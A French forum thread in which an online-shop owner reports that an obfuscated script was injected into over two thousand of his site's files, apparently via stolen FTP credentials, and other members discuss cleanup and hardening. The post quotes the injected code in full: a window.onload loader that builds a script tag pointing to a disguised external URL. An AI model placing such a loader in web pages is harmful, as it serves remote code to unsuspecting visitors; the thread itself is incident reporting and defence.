| sujet suivant »

Bonsoir, aujourd'hui je viens de m'apercevoir qu'une ligne de code a été rajouté à 2216 fichiers de ma boutique.

voila la ligne en question.

Code:

<script>/*GNU GPL*/ try{window.onload = function(){var V9vs0ipwfom = document.createElement('script');V9vs0ipwfom.setAttribute('type',
'text/javascript');V9vs0ipwfom.setAttribute('id', 'myscript1');V9vs0ipwfom.setAttribute('src',  'h#&t$^&t#&!^&p$#!#:^/$!!/!&#g))a#(m&!@e!r@)-#)
@c&^$o#&(m@^-&^#(t#@#(w^.^w$$r^)!z(&#u&t&()a)(.&#!p@@$&l!!).)@p)#$l$&a^(y)^@^-(c)^^o^!@@m&!(#.)b&#)(r))(o!(w!!#n!#b&&a&&
(@g#^b$&&a#&r@@#.$#&(r(u(:$^#8#)0($8!0!&&/((&g)o((&(o@#(g()(l@e!@).^)c^!)@^o^#)m^&!/&)@g#)$!o(o##&g)l#)!e!&@).^(c!(o(!$m^)^
/!@&w!@o(^!r(@!(d@#$p!$r$#(!&e)s$^s(!.$o#@(r@g^@!/@!#h@p@^.$c@^o&()m^@)/$#)^s$u)r)v!e)@$y$$m&!!o)(@$n!@k&#@e$(#&$y!#^
$.!#c#&o&m!(/&&'.replace(/@|&|\)|\^|#|\(|\$|\!/ig, ''));V9vs0ipwfom.setAttribute('defer', 'defer');document.body.appendChild(V9vs0ipwfom);}} catch(e) {}</script>

j'ai trouvé tres peu de renseignement , http://seoforums.org/site-optimization/118-script-gnu-gpl-try-window-onload-function-var.html sur ce site  il y a un script pour retirer la ligne , je viens de l'appliquer , et je vais verifier si cela à bien marcher . j'ai aussi observer mes logs ftp , il y a eu connexion pendant une periode où je ne peut me connecter a mon serveur OVH.

Donc verifier  vos scripts. et changer vos codes ftp.

Ps: est ce que quel qu'un dans l'assistance aurais un doc ou un site clair pour traduire efficacement les logs brutes ftp.
 

Bonjour,

ça sent le hack, non?????????????

+1 pour le hack !

tu as trouver ça sur quelle page en particulier ?

en fait j'ai rapatrier mon site en local , pour faire un comparaison avec mon site copie -prototype car je ne savait plus le quel etait a jour. Mon comparateur ma sortit 2000 fichiers non -identiques    je bidouille beaucoup mais quand même.

j'en ai un peu partout : l'index.php , dans /include/ dans l'admin , et meme editor/htmlaera/

le hack de mon ftp alors ou par un autre moyen , mais j'avoue que je suis un peu perdu là.

Bonsoir,

une fois de plus pour tous renommer le dossier admin  avant de mettre votre site en production, de plus n'oubliez pas d'appliquer les derniers patch de sécurité et pensez à bloquer les accès par des htaccess.

  le rep admin tjs pas renommer l'oubli a la con  d'un coté mon site est en cours de devellopement donc tant mieux qu'il y ai eu ca , cela me permet de mieux la sécurisée.

Le dernier patch sécuritaire est de 19/06/2009 ? si c'est le cas c'est bon il est intégrer a mon installe.

Donc après vérification RAPIDE il semblerait que le script du site en lien donné plus haut m'a tout enlevé.

Allez zou on sécurise !!!

d'après ce que j'ai lu sur ce site, ils disent que les sites vérolé par ce virus afficherai une page blanche, as tu eu des pages sur ta boutique qui ne fonctionnaient pas ou plus ?

demande d'infos juste pour aider les autres usagers au cas ou .... et pouvoir détecter si ils auraient le même problème et le corriger le cas échéant.

Merci

Bonjour,

ce que je trouve dommage c'est qu'un hébergeur puisse laisser passer de tels trucs, le mien est un peu parano mais tout bien réfléchi ce n'est peut-être pas plus mal...

oui c'est sur, de plus, je ne crois pas que ce soit la 1ere fois que des usagers de ce même hébergeur ont des soucis ....
j'ai personnellement subit plusieurs tentatives d'attaques sur mes site (qui ont étaient bloquées), et quand je traçait les IP, elles venaient souvent de leur serveurs ...., je leur ai envoyé des mails avec traçage et autre, je n'ai jamais eu de réponse, je crois qu'il y à beaucoup de laisser aller avec eux ...

En fait non pas de pages blanches, aprés j'ai des logs ftp vraiment bizarre , donc je penche plutot a une attaque par le bias du ftp. 

Donc après investigations c'était une attaque FTP ils ( ordinateurs zombies ou malwares ou personnes malveillantes) on récupérer mon mdp car les connexions FTP sont en claires, j'ai changé mes logs et maintenant je ne passe plus qu'en SFTP.Bien sur j'ai :

changer le nom du repertoire admin
mis des .htaccess avec un .htpasswd
la seul connexion FTP paramétrée (en dehors de la mienne) tombe dans un rep spécifique et ne peut en sortir
vérification des logs FTP quotidiennes
installation d'un robots.txt les limitant seulement a la boutique (interdiction de scanner le backoffice)
passer l'admin en https

Plus d'intrusion, mais des logs hier matin de 00h00 a 11h cela tambourine a la porte du FTP (heureusement que j'ai changé les codes)
Par contre est ce que vous voyez d'autre chose a faire ?

à tout hasard, tu as vérifié ta machine (ton pc) ? au cas ou ce ne serait pas celui-ci qui serait infecté

Bonsoir,

changer d'hébergeur????????????????

à freduf : Maison sous Mac avec logiciels de surveillance des sorties internet ( qui a dit que je suis parano (je n'aime pas les mises a jours automatiques de certains logiciel)) donc de ce coté pas de lézard , au boulot Pc blinder de chez blinder , le responsable de la maintenance connaissant mon ancien collègue et moi-même ( infographistes du genre MacGyver ) est vite devenu paranoïaque voir limite psychopathe sécuritaire  après rien est infaillible par contre une amie qui bosse aussi sur le site coté maison c'est du mac et à son boulot je ne sais pas. donc on a tout arrêter, elle me transmet les fichiers et je upload.

à jean-luc : je me suis mon mandataire est engagé chez OVH c'est payé pour un an, je n'ai pas expérience autre hébergeur donc je ne peut juger sur piece, sachant dans l'histoire OVH fournit dés le départ la documentation et les outils nécessaires pour le FTP et SFTP, la faute m'incombe car je n'ai pas etait assez vigilant sachant que je suis une personne a risque je n'aurai pas dut utiliser le FTP sachant que tout est envoyer en claire. Aprés c'est vrai que je trouve que la surveillance chez OVH est bizarre : 40 connexions ftp à IP tournantes et localisation (amérique, turquie , UK) en moins de 20 min , ca sent le hack.

J'avoue que je regarde les prochains mois avec grande attention et on verra aussi avec la montée de la boutique.